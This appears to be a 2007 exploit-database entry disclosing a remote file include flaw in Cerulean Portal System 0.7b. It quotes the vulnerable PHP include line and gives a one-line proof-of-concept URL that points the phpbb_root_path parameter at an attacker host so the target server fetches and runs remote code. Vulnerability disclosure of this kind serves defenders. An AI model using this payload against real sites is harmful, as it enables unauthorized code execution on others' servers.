id: 1460
date: 01/31/2007
title: Cerulean Portal System 0.7b Remote File Include Vulnerability
author: xoron
cves: 

=============================================================
Cerulean Portal System 0.7b Remote File Include Vulnerability
=============================================================



-----------------------------------------------

Cerulean Portal System (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

-----------------------------------------------

Code: 

include ($phpbb_root_path . 'portal/config.' . $phpEx);

-----------------------------------------------

POC:

www.[target].com/[script_pat]/portal/portal.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn

Thanx: str0ke, kacper

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------


#  0day.today [2023-03-23]  #